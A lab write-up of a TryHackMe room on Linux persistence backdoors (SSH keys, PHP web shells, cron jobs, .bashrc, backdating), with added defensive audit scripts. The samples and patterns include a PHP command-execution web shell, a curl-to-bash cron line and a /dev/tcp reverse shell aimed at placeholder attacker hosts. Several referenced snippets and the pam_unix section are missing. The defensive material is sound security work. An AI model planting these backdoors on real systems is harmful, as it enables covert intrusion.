Linux Backdoors

Date: 17 May 2021

Author: Dhilip Sanjay S


Click here to go to the TryHackMe room.

Introduction

  • A backdoor is simply any mechanism we leave behind to guarantee our persistent access to the machine.

  • So even if the machine is rebooted, shut down, or otherwise interrupted, we would still be able to get back in.


SSH Backdoors

  • The SSH backdoor essentially consists of leaving our SSH public key in some user’s home directory. Usually the user would be root, as it’s the user with the highest privileges.

  • Steps:

    1. Run ssh-keygen in your local machine.

    2. Add the public key to authorized_keys in the /root/.ssh directory of the target machine.

      • Ensure proper permissions: chmod 600 ~/.ssh/authorized_keys

    3. Now that we have left our backdoor, we can simply log in as root using the following commands:

      • chmod 600 id_rsa (This is necessary because if we don't do it, ssh will complain about permissions not being secure enough on the key)

      • ssh -i id_rsa root@ip to log in to the target machine.

  • Note: This backdoor isn't hidden at all. Anybody with the right permissions would be able to remove our ssh public key or the file authorized_keys entirely.
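Because the note above says the key is easy to spot by anyone who looks, the defender's side of this section is an authorized_keys audit. The following script is an added example (not part of the original notes or the TryHackMe room): it parses an authorized_keys file, computes the same SHA256 fingerprints that ssh-keygen -lf prints, compares them against an allow-list, and also flags loose file permissions. The key blobs in the sample are constructed stand-ins, not real keys, and the allow-list set ALLOWED is an assumption for the demo.

```python
import base64
import binascii
import hashlib
import stat

# Token prefixes that mark the start of the key type in an authorized_keys line.
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (what ssh-keygen -lf shows)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield one dict per key line; leading options (command=..., from=...) are kept separately."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        try:
            fp = fingerprint(tokens[idx + 1]) if idx is not None else None
        except (binascii.Error, IndexError):
            fp = None
        if fp is None:
            yield {"line": lineno, "fingerprint": None, "comment": "", "options": "", "raw": raw}
            continue
        yield {
            "line": lineno,
            "type": tokens[idx],
            "fingerprint": fp,
            "comment": " ".join(tokens[idx + 2:]),
            "options": " ".join(tokens[:idx]),
            "raw": raw,
        }


def audit_authorized_keys(text, allowed_fingerprints, file_mode=0o600):
    """Return findings: loose permissions, unparseable lines, keys not on the allow-list."""
    findings = []
    # Stricter than sshd's StrictModes: any group/other access bit is reported.
    if file_mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"file mode {file_mode:04o} lets other users read or alter the key list")
    for entry in parse_authorized_keys(text):
        if entry["fingerprint"] is None:
            findings.append(f"line {entry['line']}: unparseable entry: {entry['raw'].strip()}")
        elif entry["fingerprint"] not in allowed_fingerprints:
            who = entry["comment"] or "no comment"
            findings.append(f"line {entry['line']}: key not on allow-list {entry['fingerprint']} ({who})")
    return findings


def _fake_blob(label):
    # Constructed stand-in for key material; not a real or usable SSH key.
    return base64.b64encode(label.encode().ljust(48, b"\0")).decode()


ADMIN_BLOB = _fake_blob("admin-workstation-key")
UNKNOWN_BLOB = _fake_blob("key-nobody-approved")

# Constructed /root/.ssh/authorized_keys: one approved key, one that is not.
SAMPLE_AUTHORIZED_KEYS = f"""\
# keys approved by the admin team
ssh-ed25519 {ADMIN_BLOB} admin@workstation
ssh-rsa {UNKNOWN_BLOB} someone@unknown-host
"""

# Assumed allow-list: fingerprints the admin team has actually issued.
ALLOWED = {fingerprint(ADMIN_BLOB)}

if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED, file_mode=0o644):
        print(finding)
```

In real use, read /root/.ssh/authorized_keys (and every other user's) from disk and take file_mode from os.stat(...).st_mode; the allow-list comes from whatever system of record issues keys. Fingerprints rather than raw blobs are compared so the same check works across key types.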

In what directory do we place our keys?

  • Answer: .ssh

What flag in ssh do we use to show our private key?

  • Answer: -i


PHP Backdoors

  • If you get root access on a Linux host, you will most likely search for credentials and/or any other useful information in the web root. The web root is usually located at /var/www/html.

  • You can create a php file with any name and put the following piece of code:

  • Notice that we are using $_REQUEST['cmd'], which means that you can pass that parameter either in GET or in POST data.

  • To access the shell:

  • Here are some ways that we could make this backdoor a little more hidden:
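On the defensive side, the pattern the notes describe (a request superglobal fed straight into a command-execution function) is exactly what a web-root scan should look for, wherever the file is hidden. The following script is an added example, not code from the original notes: it scans PHP sources for user-controlled input reaching system/exec/eval-style calls or the backtick operator, and separately flags .php files sitting in dot-directories or upload/image/cache folders. The web-root contents are constructed in a dict for the demo; in real use they would be read from disk.

```python
import re

# Request superglobals whose contents an outside party controls.
USER_INPUT = r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER)\b"
# PHP functions that pass a string to a shell or to the PHP interpreter.
DANGEROUS_CALLS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
# A dangerous call whose argument list references user input, or a backtick
# command (PHP's shell-exec operator) that does.
WEBSHELL_RX = re.compile(
    rf"(?:{DANGEROUS_CALLS}[^;]*{USER_INPUT})|(?:`[^`]*{USER_INPUT}[^`]*`)",
    re.IGNORECASE,
)
# Directories under a web root where a stray .php file deserves a second look.
ODD_LOCATION_RX = re.compile(r"/(?:\.[^/]+|uploads|images|tmp|cache)/[^/]+\.php$", re.IGNORECASE)


def scan_php_source(path, source):
    """Return one finding per matching line of `source`, plus a location finding if the path is odd."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if WEBSHELL_RX.search(line):
            findings.append({
                "path": path,
                "line": lineno,
                "reason": "user input reaches command execution",
                "snippet": line.strip(),
            })
    if ODD_LOCATION_RX.search(path):
        findings.append({"path": path, "line": 0, "reason": "php file in unusual directory", "snippet": ""})
    return findings


def scan_webroot(files):
    """`files` maps path -> source text; only PHP-executable extensions are examined."""
    findings = []
    for path in sorted(files):
        if path.lower().endswith((".php", ".phtml", ".php5")):
            findings.extend(scan_php_source(path, files[path]))
    return findings


# Constructed sample web root (not taken from any real server). The last entry
# mirrors the backdoor the notes describe, hidden in a dot-directory.
SAMPLE_WEBROOT = {
    "/var/www/html/index.php": "<?php\necho 'hello';\n",
    "/var/www/html/contact.php": "<?php\n$name = htmlspecialchars($_POST['name']);\necho $name;\n",
    "/var/www/html/images/thumb.php": "<?php\n$size = (int) $_GET['s'];\n",
    "/var/www/html/.cache/.config.php": "<?php system($_REQUEST['cmd']); ?>",
}

if __name__ == "__main__":
    for finding in scan_webroot(SAMPLE_WEBROOT):
        print(finding)
```

The line-level regex is deliberately simple and will miss input that is first copied into a variable or decoded; treat a hit as a triage lead and pair the scan with a comparison of the web root against the deployed application's file manifest, since a backdoor's strongest tell is that the file should not exist at all.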

CronJob Backdoors

  • View the contents of /etc/crontab:

  • This represents all the tasks that are scheduled to run at some time on your machine.

  • In the example above, you can see that there is a "*" symbol under the "h". This means that the following task would run every hour.

  • Add this line to our crontab file (* for every field means our task will run every minute of every hour of every day, etc.):

  • The contents of the shell file:

  • We would have to run an HTTP server serving our shell using python3 -m http.server 8080

  • Don't forget to listen on your specified port with: nc -lvnp <port>

  • Note: This backdoor isn't really hidden, because anyone can see it just by looking inside /etc/crontab.

What does the letter "m" mean in cronjobs?

  • Answer: minute

What does the letter "h" mean in cronjobs?

  • Answer: hour


.bashrc Backdoors

  • If a user has bash as their login shell, the .bashrc file in their home directory is executed when an interactive session is launched.

  • You could simply run this command to append your reverse shell to their .bashrc.

  • Note:

    • One important thing is to always have your nc listener ready as you don't know when your user will log on.

    • This attack is very sneaky as nobody really thinks about ever checking their .bashrc file.

    • On the other hand, you can't know whether any of the users will actually log in, so you might wait a long time.
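The cron and .bashrc backdoors above share the same giveaway: a scheduled or startup command that fetches a script over HTTP and pipes it to a shell, or opens a network connection back out. The following script is an added example that is not part of the original notes or the room; it serves both sections with one shared indicator list, parsing /etc/crontab's seven-field format (schedule, user, command) for the cron case and scanning a shell startup file line by line for the .bashrc case. The crontab and .bashrc contents are constructed samples with placeholder host and port values.

```python
import re

# Command-line indicators shared by the crontab and .bashrc checks.
INDICATORS = [
    ("download-and-execute", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b")),
    ("bash-tcp-redirect", re.compile(r"/dev/tcp/")),
    ("netcat-exec", re.compile(r"\bnc(?:at)?\b.*\s-e\s")),
    ("interactive-shell-redirect", re.compile(r"\b(?:ba)?sh\s+-i\b.*[<>&]")),
    ("world-writable-staging", re.compile(r"(?:^|[\s=\"'])/(?:tmp|dev/shm|var/tmp)/")),
]

CRON_FIELDS = 5  # m h dom mon dow


def match_indicators(command):
    """Names of every indicator that matches the command string."""
    return [name for name, rx in INDICATORS if rx.search(command)]


def parse_system_crontab(text):
    """Parse /etc/crontab lines (schedule, user, command); env assignments and comments are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):  # @reboot, @hourly, ... take the place of all five fields
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:
            parts = line.split(None, CRON_FIELDS + 1)
            if len(parts) < CRON_FIELDS + 2:
                continue
            schedule = " ".join(parts[:CRON_FIELDS])
            user, command = parts[CRON_FIELDS], parts[CRON_FIELDS + 1]
        entries.append({"line": lineno, "schedule": schedule, "user": user, "command": command})
    return entries


def audit_crontab(text):
    """Flag entries whose command matches an indicator; note very frequent or boot-time schedules."""
    findings = []
    for entry in parse_system_crontab(text):
        reasons = match_indicators(entry["command"])
        if reasons and entry["schedule"] == "* * * * *":
            reasons.append("runs-every-minute")
        if reasons and entry["schedule"] == "@reboot":
            reasons.append("runs-at-boot")
        if reasons:
            findings.append({"line": entry["line"], "user": entry["user"], "reasons": reasons})
    return findings


def audit_shell_rc(text):
    """Flag lines of a .bashrc/.profile-style file that match an indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = match_indicators(line)
        if reasons:
            findings.append({"line": lineno, "reasons": reasons})
    return findings


# Constructed /etc/crontab: two stock Debian-style entries and one planted job
# that fetches a script from a web server on port 8080 and pipes it to bash.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root curl -s http://ATTACKER-IP-PLACEHOLDER:8080/shell.sh | bash
"""

# Constructed ~/.bashrc: ordinary lines followed by a planted callback with placeholder host/port.
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
case $- in *i*) ;; *) return;; esac
alias ll='ls -alF'
export PATH="$HOME/bin:$PATH"
bash -i >& /dev/tcp/ATTACKER-IP-PLACEHOLDER/PORT-PLACEHOLDER 0>&1 &
"""

if __name__ == "__main__":
    print(audit_crontab(SAMPLE_CRONTAB))
    print(audit_shell_rc(SAMPLE_BASHRC))
```

Run audit_crontab over /etc/crontab and each file in /etc/cron.d (same seven-field format), and audit_shell_rc over every user's .bashrc, .bash_profile and .profile plus /etc/bash.bashrc and /etc/profile.d/*; per-user crontabs under /var/spool/cron have no user field, so they need the five-field variant of the parser.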


pam_unix.so Backdoors


Making Detection More Difficult

  • To make detection of all of these backdoors more difficult, one can set the modification time of the created files (the timestamp that ls -l shows) to a past date:
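Backdating with touch only rewrites the atime and mtime fields; the inode change time (ctime) cannot be set through utime(2) and is bumped to the current time by the very call that backdates the file. That asymmetry is the detection hook, shown in the following added example (not code from the original notes): it walks a directory and reports files whose mtime sits well before their ctime, and the demo() helper builds a constructed temporary tree in which one hypothetical file is backdated with os.utime, the same effect as touch -d.

```python
import os
import tempfile
import time
from pathlib import Path


def suspicious_timestamps(root, min_gap_seconds=24 * 3600):
    """Return (relative path, ctime - mtime) for regular files whose mtime is
    more than min_gap_seconds older than ctime. ctime is kernel-maintained and
    is updated when mtime is rewritten, so a backdated file shows a large gap."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue
        st = path.stat()
        gap = st.st_ctime - st.st_mtime
        if gap > min_gap_seconds:
            hits.append((str(path.relative_to(root)), gap))
    return hits


def demo():
    """Constructed demonstration: one file is backdated by a year, one is left alone."""
    with tempfile.TemporaryDirectory() as tmp:
        backdated = Path(tmp, "www", "config.php")  # hypothetical path for the demo
        backdated.parent.mkdir()
        backdated.write_text("<?php // constructed sample ?>\n")
        honest = Path(tmp, "notes.txt")
        honest.write_text("constructed sample\n")
        past = time.time() - 365 * 24 * 3600
        # Same effect as `touch -d`: atime/mtime move to the past, ctime moves to now.
        os.utime(backdated, (past, past))
        return sorted(name for name, _ in suspicious_timestamps(tmp))


if __name__ == "__main__":
    print(demo())
```

Files copied with cp -p, unpacked from tarballs, or installed from packages also carry an mtime older than their ctime, so a gap is a triage signal to combine with the other checks rather than proof on its own; on the other hand, a ctime that has itself been pushed into the past can only come from changing the system clock or editing the filesystem directly, which leaves traces of its own.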

